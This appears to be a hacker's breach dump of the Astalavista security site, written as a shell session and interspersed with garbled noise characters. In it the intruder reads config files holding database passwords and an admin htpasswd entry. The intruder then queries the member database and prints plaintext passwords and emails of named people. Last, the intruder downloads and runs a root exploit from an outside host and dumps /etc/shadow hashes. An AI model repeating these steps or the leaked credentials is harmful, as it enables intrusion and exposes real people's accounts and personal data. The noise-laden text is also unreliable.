drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
; b" k! n4 W' \ }drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0074 {1 N: L0 X5 L! t. t, a- w2 }6 @
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
% _7 \( K2 f' I, G: j! \drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com+ \( X& e8 v6 h, n
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend3 B4 p, X$ f; l. |+ s/ |6 ^+ `2 S
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner& w& H7 m9 z, t' ^
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg6 M2 f5 b( i" ?7 c+ ~+ m; f+ E3 Z
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
# b8 Q v9 O( p% f* f2 Pdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
! g( ~% {6 I( e3 |drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
: a+ w( h' P* K1 z-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php6 w" D+ ]8 [- }
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
& l) K/ r5 r* o3 W6 edrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
. A9 l0 h/ q+ y( g# K- ]8 \drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour" x D8 F5 g, h+ d0 r/ m, n
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
/ ^% h& }4 ]/ @1 U& r) f-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
, q! D: |; v* |& ~, A-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
, K& t9 L* ~2 L C-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html, b7 j: m! u ?6 `
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
" F; `9 l ^' b7 }: F0 \# C-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
a) G; S4 M4 K-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
* ~) V; |; M: Z5 l2 {2 adrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc+ q' s3 ^! S% |4 q- |9 y4 V
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
% I" [- }0 I4 v- cdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
1 a, D" R1 f: I. l5 U/ C, Wdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log1 Y" n/ B3 w! L- c
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member; n' ~4 I# s. s8 d9 c' @
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata4 P3 W; P {' y2 S9 y# y1 g
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
1 \. w, T9 b" B$ x, g2 p. \5 `-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf0 s8 L! i+ Q* v
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
( {; u4 C S% s! S+ L! e-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
- S; V- M1 K1 v7 u& U$ W6 Qdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss9 O3 W: a3 m8 f! f% V5 [9 N
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
+ |1 E4 O0 Z4 k/ d6 g" i i- d0 [6 cdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
# f2 j2 P! O/ ?: m; j$ _% U( i! l5 b- q2 xdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes3 J' y9 j8 I. t" x# p0 D
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src9 x$ i/ p* E: B6 G. C
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
# ?' i4 V" V5 l- y9 ~drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v21 O8 P' o) t$ u
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
9 N: a* n" g5 ?! Z5 w0 n. v- N-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
5 \/ o0 F, X4 v3 Ydrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
9 x) F% K4 H% G" ~4 w2 z Z
- w6 {" e2 _5 gsh-3.2$ head -20 index.php
+ z( v0 _7 @5 P8 D<?PHP; s+ u6 q- g( l( @5 a' V; X* m
/**9 W4 a7 Z7 T9 z& t. q! @
* Mainfile (external) for astalavistaNET v2.0
: [9 K! m; m3 A*
# i8 ]4 g; x% b' J* @copyright Astalavista IT Engineering GmbH
- ^/ }' E; B9 P4 z% q7 E" A* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
" l [. z2 J& y/ Q% e8 P- B* @version 1.0
- x4 Z/ t+ a3 @% t8 O6 ]) u*/
7 {& `! O% r. }$ X- @, X$ p, d, J7 F! _, W9 i6 P
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
( J& {" c8 k- } M& R; h4 W. A $dontStartSession = false;: a0 H6 k- u" A/ ]- p+ M
} else {+ C" p8 m( g5 @
$dontStartSession = true;8 B! s$ D E: c# v
}
) W% M3 b$ p: S6 y+ l require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);0 F I) W! _2 Q: y6 L
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
& j) r2 T5 C3 M- B require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
- N$ m1 t8 x" | require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);' d. v# C# ?; D( t
# s/ K) s6 L" p' Z- p$ D
sh-3.2$ cd config
: h: I3 P* L6 v" O0 N- qsh-3.2$ ls -la$ T1 {, x e1 L0 O* Y* u- B; Q
total 32
+ k- e( S8 q# R4 L. k q# Ldrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .0 l% n, W/ x! y8 W
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
6 j3 T# H4 L1 l. J3 N- Q7 K$ `-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
) [2 P- v. ~2 p' Z% K-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php5 k R* p5 L& H2 D0 h# G7 E& n
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
, x1 d/ z0 ~8 e8 a. @0 E-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php/ q: e0 L# u: i/ j
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php& Y- J4 w' C2 G2 ^
( ^# h( A" y. h2 [3 E' U/ h- m
sh-3.2$ cat com.conf.php
* G* X$ g9 G/ `& b) v[snip]: B# P: w6 A. W+ U) G
//member-database
6 j9 p) n5 h8 q$_CONFIG['db_mem_server'] = ‘localhost’;& n' Z& e, b$ n' d
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;: N5 H) J6 V* R/ `
$_CONFIG['db_mem_user'] = ‘astanet_db’;9 C; d; K. E) G# b$ M
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;2 K7 V7 `) W/ T$ x; I/ j5 z
$_CONFIG['db_mem_debug'] = false; //true or false
8 z! e% e0 X4 B9 F0 m: d//ads-database
. s& s! | `$ G5 J1 O; P4 d$_CONFIG['db_ads_server'] = ‘localhost’;
1 D( E6 D9 X$ l4 A$_CONFIG['db_ads_database'] = ‘astanet_ads’;
H* o! B2 g+ ~/ G5 U$_CONFIG['db_ads_user'] = ‘astanet_db’;; ]. M x+ a% j3 k0 m6 }2 N& Z
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;, |" q6 E- Y. I; }' d! b7 n5 d
$_CONFIG['db_ads_debug'] = false; //true or false
0 I6 N2 Q; {0 O; G- ~//rainbow-database
# v& A- B0 b$ D/ t [* |$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;6 W* r6 q7 s8 S: t7 f
$_CONFIG['db_rainbow_database'] = ‘rainbow’;5 g0 L/ |$ }+ M6 p2 m
$_CONFIG['db_rainbow_user'] = ‘dinu’;
8 o+ E6 [0 Y) b0 _7 }9 f0 n$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
1 F! a1 O0 ~7 d+ A$_CONFIG['db_rainbow_debug'] = false; //true or false9 x; }' n9 h4 ^- t! I
//mailing lists database
. |% N8 P/ I/ R L$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
7 I& R* P4 |* R: C0 O4 j* Z* V$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;* P5 I D" |7 Y) l6 c1 d
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;, s1 a3 R8 h* I/ T* m+ n/ f
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;& x2 S/ c+ K* A$ N8 j2 z( u
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
% r1 Q8 _4 V) @% t//paypal
! D3 Q ^8 Q/ c, B% |2 f9 _& }$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
6 C' H8 T' l5 n- i. H" M$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
) j2 T: @7 V+ `0 a, r$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;" \" X) d. L$ }: ^5 U7 X6 [
$_CONFIG['sub_pp_noship'] = ‘1′;
) x1 ?! R3 }0 F; g \$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
5 h# J9 i, X1 A: j* @0 G[snip]
8 k( @& I# x8 Y2 H8 ~
9 ^% \, ^! N' Y& U+ W2 N% ~8 Csh-3.2$ cd ..* M+ ]* q, F4 A8 d/ F
sh-3.2$ cd member) [ T/ Z! A- D) q- D
sh-3.2$ ls -la- U( n; x2 L& `0 ^6 C0 P
total 20
3 q! v# x2 [& \- [' ^5 Rdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .. w2 p5 n4 e& H/ c: Q
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... o2 @# `: @' d; Z" z: P
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess+ V' ~, R( K2 | o |
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php9 U. z6 s, e- I1 p* V7 c7 ]+ H z
sh-3.2$ cat .htaccess
+ b3 T! K* f; a$ M: p8 _0 dSecFilterEngine off. ]6 `+ ?0 \& n1 D& s" p
7 C! a' e5 A3 D" [sh-3.2$ cd ..! \) ~+ u. T$ \- o; w7 _# [
sh-3.2$ cd cron
" q0 f( o! `2 u$ T( V! Hsh-3.2$ ls -la& p* g4 _+ r$ g" a
total 1688 J9 {6 {4 e$ r b! n( q) q1 E
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
. ?. X5 |0 V# i, |2 Hdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, D' }, ~# _, W/ B! B, N) K-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php; \' t( ?7 f6 o8 W% \" ?1 \1 ?- G2 G0 u
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
/ V) t8 e$ T: Y: r-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
: J, h" n% {3 d: D1 }' D; ^-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
# { P- p$ Z. w5 K8 E/ f d& T+ h-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
9 {7 r/ e6 Q" D$ J-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
9 x' O5 W$ y, l T2 p/ | c-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
% [8 w* B' y; N. o! Y-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php' Q n: s+ O3 |6 W3 \0 n
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
/ A/ w& g( f& Q1 E) k5 R-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
; e' s! |$ ]& a4 [6 J! a/ f-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
; K" J4 N$ V4 \2 U5 s-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
3 V- X0 u1 A* _! [0 i-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
0 T0 k7 o O0 Z, B. D-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
+ b; P; Y9 _0 a1 Q7 V-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php# [- {- h- x7 }, O3 }4 q$ f
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
# W/ V* d; t; I( I7 j7 S7 _-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
( f2 u0 u; M+ U-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
+ O' P- e2 u6 B2 W$ h( ~! Gdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email+ ]' C# N# B$ e: E7 U0 V$ d& l
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
/ A0 |0 u6 h0 o-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
5 d6 x+ W M: a! j- n3 s" P0 w5 m! q9 M
sh-3.2$ cd ..
. o. r2 c6 F4 Gsh-3.2$ cd _007& G2 L$ Q$ A! V% r1 E
sh-3.2$ ls -la
) Q0 A: {( d# h6 e8 ]/ q# ^total 24
' r' A( W& _ _$ m& Edrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
2 d/ U% r4 F- ] Y9 Adrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... V9 h) n% \* o6 L- G
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
/ ?) f7 C# ` ~+ Q-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
# F' P& Q! i E# r" g-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php1 K0 Z3 R/ e& f3 e2 ]2 S5 b9 M
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap6 {9 k0 L+ m. @ P
/ ?1 R% W; J% ~, w3 bsh-3.2$ cat .htaccess
- P: c) q' o8 V5 mauthType Basic; g/ N5 ?0 C+ ]8 D, g
authName Admin2 M1 ~1 S% m+ w# C$ U3 `" ^4 Q
authUserFile /home/astanet/auth/.htadm_pwd) I! a' ?, k7 n% Q7 i4 S0 m) L
require valid-user
6 O5 W- x3 W8 p$ M, [1 j) u8 B& J! }
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
) A) D+ i. [* A" ~5 Cadmin2net:CR0bl65MwhfT
3 T* k* o% S: f( l
/ ?) V5 \1 t7 S1 M$ p Psh-3.2$ mysql -u astanet_db -p
; R( o* v0 y6 @5 m& OEnter password:3 }8 q! F1 C4 v) I' a
Welcome to the MySQL monitor. Commands end with ; or \g.$ _- Z5 X& C# y
Your MySQL connection id is 2751538 P' @- C7 V# j, U: A+ m
Server version: 5.0.45-community-log MySQL Community Edition (GPL)& b3 m5 C6 M; b. |, B
& F) ?: f% H0 V$ o7 k: R
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 G' ]$ r8 n* Y& n- X: ~' r
! K# c' g* k3 W" gmysql> show databases;
4 R) V- D0 N) ~7 A7 u+———————–+
- V* F, X' p! Z$ U' ?| Database |
0 A- x7 T2 K, Y3 ~# S+———————–+8 \% m6 x" e& G, O7 t0 \
| information_schema |
o7 L6 G& ] u. H' M0 O0 v| astanet_ads |
2 p( t+ h e, t5 H* G| astanet_mailing_lists |9 I* h) H! F1 \
| astanet_mediawiki |1 i: \7 a' W$ B# ^
| astanet_membersystem |
. L; u$ K# y/ F& [| test |
7 f" D% ~$ _% H, [& b# `5 J+———————–+
+ O, b% E) s' j9 r8 _* a6 rows in set (0.00 sec)
. ?7 y! P7 l2 I) ?$ h. h1 {4 q$ Y; T# l4 B7 ~ T9 x
mysql> use astanet_membersystem9 _7 u9 ~7 m+ J& Q4 t9 A- P2 S+ W2 G
Database changed
, S) a/ P* Y$ _/ t: D/ Nmysql> show tables;/ ?4 q4 F' d5 n( j; ?
+———————————–+
u( ~5 S( N( T1 U4 u% K# I* }. f| Tables_in_astanet_membersystem |+ I. w- x' t8 V0 i1 e: Y! S
+———————————–+, c. O" ?& _* y; h" ?
| blacklist_categories |
$ ?! Q5 R1 [, b! V h/ r% [| blacklist_content |
3 ^6 _% @6 `7 X( H| blacklist_levels |
9 a2 F. \$ F6 S: }( _| blacklist_mcset |7 |. U' [! j4 D1 j! O) K
| dir_categories |0 r1 }8 {6 a6 t6 T H
| dir_comments |$ X1 o2 K: p+ o* H x
| dir_links |
& d P& M- T* o' G' b" o( t. w% {| dir_temp |5 n, M8 o7 u/ d: K2 e- E
| dir_votes |
8 K9 B. m7 Y# Q P| documents |
. U* h/ h( Y) f| documents_categories |
$ S; a' U8 j3 @8 e/ t2 M7 U| email_content |
" k4 I( M# l0 J6 x: ^ X| email_settings |3 a" j' r& `, t: h
| exploits |9 p4 L$ C. M3 L4 x" M7 \# r! M
| exploits_categories |% X' ]1 W$ X* w2 y7 V
| exploittree_categories |
2 n7 G9 m( i0 d. q! e+ O$ F- { @| exploittree_exploits |) T( n3 ? n+ J1 m8 c
| home_values |
& i; x7 T- c1 u9 r| iso_countries |
$ P3 A$ C e0 i3 O7 m: p. P| links_categories |
' j' _. I6 v' l" d| links_records |9 f) O0 a; e+ f6 I# \8 b
| links_unauth |
# t. y+ j/ [: [+ s' Y U5 }| links_votes |5 o2 p7 n9 q/ @" C
| log |. k+ A( f% ?# V* q# C
| news_categories |+ |4 K7 N9 ^, `9 o) X3 g
| news_comments |& P9 k: F: \7 I' y, `* b
| news_emoticons |( T! Y* p" l. ~
| news_latest |' [8 N y2 k+ t5 q
| news_messages |0 H) M. V0 G t, L9 X6 j
| news_statistics |
& Z0 D$ p( b+ b0 b2 x| news_votes |
) t" T4 W! c; @* A0 ]| prices_content |
7 _. A. v0 P$ \$ _| prices_offers |
# C0 ^% p4 d1 t6 W2 _9 @; P| rss_settings |
* Z4 Y _. t; q# [8 q) E+ K| sessions |0 ~. y& f4 x- r) V8 {4 _, B" w' I3 i
| stats_signups |
4 \2 g! n2 p% N+ W| u2u2 |! S: o4 x, N4 V5 ~: W& b
| u2u_contact |
# f0 { z0 o! j3 T `; u| u2u_settings |
0 }1 R+ a9 N- [| user_keywords_selected_categories |
& T2 I" t# T3 _; F| users |3 A/ O1 m& W9 ]" _3 |3 N
| users_ipn_test |. i7 R' `3 M1 ^$ X* ?$ o) }- S
| users_keyword_values |, ?2 b- B3 c. z
| users_profile |6 }' G* ?7 f" r, N6 _6 m2 ~
| users_temp |
! B8 ^* a8 T- Y9 o u| users_upgrade |
; l2 \1 H/ f+ f( {- }# Q5 [+———————————–+
8 r @% Z! t$ O. F46 rows in set (0.00 sec)
1 d* V6 u+ ]4 j* ^0 b/ x. }6 e& N9 z
mysql> describe users;
, {2 M+ ?+ _% B1 |2 {+————————–+————————————–+——+—–+———————+—————-+ }* Z$ G/ `4 ?) P$ _* T: _* j
| Field | Type | Null | Key | Default | Extra |* B* ?7 D( E) d0 _
+————————–+————————————–+——+—–+———————+—————-+5 h! i) x; O- w
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
2 G& f$ A2 c" H8 y' ]6 g J5 n+ l| user | varchar(50) | NO | | | |
0 C! a, P# W. K5 |, a, x| nickname | varchar(30) | NO | MUL | anonymous | |
8 }7 a9 A/ s5 D: s! Z! w| password | varchar(30) | NO | | | |# J: D+ @$ h4 A, p
| userlevel | tinyint(3) | YES | MUL | NULL | |
6 e4 {5 H+ K1 l- F" q. V- M& v| exp | int(8) unsigned | NO | | 0 | |
- y- g, L6 C( J" _4 y* @( }| email | varchar(50) | NO | | | |
( z9 f2 y3 x5 g6 F; V0 }3 w; ~2 y| ip | varchar(15) | NO | | 0 | | P; M$ e+ {: {' J9 S
| proxy | set(’0′,’1′) | NO | | 0 | |
" l$ c; j7 p' \# @, q4 g L* ^/ N| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
; J; v9 z' p8 Z5 @; X2 o, P/ }; o| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
5 u* M% v. M& \2 ?| anz_in | tinyint(1) | NO | | -1 | |+ O& A2 |. z; O( j, \% j# i9 \ D
| status | tinyint(1) unsigned | NO | | 0 | |
# W. ]' g! Q% E9 \. P( S+ z8 b| checked | set(’0′,’1′,’2′) | NO | | 0 | |
o7 F( X* @5 r6 E( V# Q7 {) p( K| freemember | set(’0′,’1′) | NO | | 0 | |4 W, n# u! z! l% A( A, w
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |4 t$ ^8 a5 E+ V
| lang | tinytext | NO | | | |7 e) G. x1 Y a
| adid | smallint(6) | NO | | 0 | |
# N V8 X5 N' m% i# K7 e| pp_txn_id | varchar(255) | YES | | NULL | |
- J& c& u! |. E% {* \| cnb_transaction_id | varchar(255) | YES | | NULL | |1 R: }; x0 W6 e H k7 N
| cnb_order_id | varchar(255) | YES | | NULL | |
# S- @8 p1 d' d| cnb_user_id | int(11) | YES | | 0 | |0 E6 L2 s; C8 y! R
+————————–+————————————–+——+—–+———————+—————-+ J1 N; e r, w4 M
22 rows in set (0.01 sec)* b5 E) q5 x1 ?2 H) k
" U+ I) Z" k5 B* K2 Emysql> select count(*) as skids from users;
" i* k' T' M: o" ?+——-+
B [& [6 X+ W9 A2 ^! P| skids |
9 h; G5 n. k% b+——-+
9 _% L( |0 }! d/ f% l| 25199 |
( a# i& Y, {- V$ j5 r+——-+
# T2 x( n9 h: J4 z9 `6 [$ S1 row in set (0.00 sec)
& y7 v3 ]$ J# i1 d/ q, ^
1 Z: @* V5 E4 g# I& q3 Lmysql> select user,nickname,password,email from users where userlevel = 1;
" g& q' \* v \8 U( J+————————–+———————-+——————+———————————–+" n" y8 G( z: J
| user | nickname | password | email |
4 y* j% c% H: ]) l4 y+————————–+———————-+——————+———————————–+1 z8 x$ M; p! Z7 V+ z( _7 \5 m1 R
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
; M0 i) x1 h) c" l9 w: b3 V| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |4 q- R1 }6 L9 r4 S
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |& w* o# ^# v6 b3 x$ ` `6 b
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |$ ^1 O3 K7 n9 u
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |; o* t1 h3 G# O+ w% h; o
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
, c) ?1 o9 @. z$ c. K) g4 Y| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
3 ?+ f( b# ]& j% w/ ~6 f* M| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
* K& q5 Y0 K9 t6 J" `/ t& @$ T| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
4 t h8 u" _% k' p6 a) w| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
8 M1 R# d5 J' z9 `: P7 a( l| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |: N" D+ [* r' u, t/ ?3 J* R
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |9 X3 D) P" w* N9 d# ]1 k
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |( ~- d* P: `4 H4 G/ e* R
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
" |, Z5 Q+ T: H$ B& X: R' q| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
& S& w3 \. f1 t5 @| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |" W* Z- S8 j6 A0 f- M0 b i
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |5 x0 j1 v' i0 G
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
4 ?: q( O x" L: p1 A* G| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |1 E2 x, C9 c3 B3 j, i
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
, N7 q. S2 [, @: @/ L| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |5 t7 A8 n& ~. a& F: P
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
$ F N5 |3 X. c# t; r| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
" J* S5 v) C! i; Z/ U- {| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |- l* E9 R/ F3 r" q
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
! X% b" j4 n3 N| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
a: \& q" s! z# a| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
% I! v0 p% a& D/ h$ [1 _. a$ p+————————–+———————-+——————+———————————–+. {8 O% Y+ a/ P
27 rows in set (0.00 sec)6 {* k; H) h/ _7 I6 E! {
" n, e" x6 W9 Mmysql> exit;
p. H! N, s0 I ]2 h+ YBye& a, @2 N" z8 P2 D
- g2 I% G0 F: G- K
[~] plaintext passwords? yes,
: |; z3 ~) U) x% g. o8 uThose so called “security professionals” who charge you $6.66 / month to
& w3 c9 w8 Z e' Rregister at their hack-proof portal, save your passwords in plaintext…* [3 u; f6 k: H$ V
brilliant!. ]' b% V& O* |: {' p
6 B, s- b; Y N" i! t: |' d7 E) d
[~] This been fun but we want more.
$ U! G# V3 t3 ? V* l# t) V2 M" ]+ J1 V! k7 B% y! m
sh-3.2$ uname -a
# `4 u4 n& [9 K& ?; q2 |0 p5 YLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
- w6 b' P& Z* o1 S0 N( nsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]9 B F$ z3 i F
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
9 S" |* F/ H! f6 Y/ N# p+ Y2 Y5 WResolving anti.sec.labs… 13.33.33.37& \! E; o# Y( }- }" J$ X; U
Connecting to anti.sec.labs|13.33.33.37|:80… connected.+ K& t" [' G; _. u) W* d$ s
HTTP request sent, awaiting response… 200 OK
$ t3 N$ D! h% N: W- W# ZLength: 18200 (18K) [text/plain]
7 Z9 S9 g4 s9 ^5 {7 }Saving to: `g0troot’
8 F1 L }* k9 ?# _0 H8 _& v, X' ]0 C# C1 r
100%[=========================================================================================================================================>] 18,200 58.6K/s in3 m$ [9 ]7 @9 w- _" G
0.3s
6 k4 o' R8 O" O# N% y6 ?
6 t. D* o: x( C' E% w5 @18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]9 i1 ~% ~/ r8 d/ B" V. { c/ Q# ~
- q$ k, y+ R& }9 A' \6 }. }' C0 d
sh-3.2$ ./g0troot -i x86_64
0 n$ k" {; @% b* g; w% f7 v# a" S[+] g0troot - anti.sec.labs" x# X3 y* ]3 x% |. G. a
[+] Target: 2.6.18-128.1.10.el5
9 Q/ D+ @0 i: m/ w! w[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
6 e# ^# K+ n" H( j7 }( U6 E5 x
' `8 @' @9 Q$ C( _0 A; X0 x. @0 z[+] r00tr00t
; x1 Y. s: H' E0 t0 l: Q! l[~] Executing shell…$ x4 d/ U0 S& v0 }/ I$ O+ ?, l
0 x8 A4 }+ k1 t
sh-3.2# id: H$ o7 m' R. D. m+ @
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+ j: j+ F2 c8 T2 N
' m* T: r& N; }- Tsh-3.2# cat /etc/shadow X2 }! K! I) l, ^* \7 e1 ]6 T
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
( ^1 X" y, F! B7 S" s7 \[snip]
+ j+ }% P9 d1 O* Iadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
2 f0 X& a, O! r1 U% \jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
5 D5 L1 P2 h( A. ~' x! gcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
# R- P* B: v. d" b: H c0 a; @astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::/ k2 b. |8 t$ ?7 H- `# p
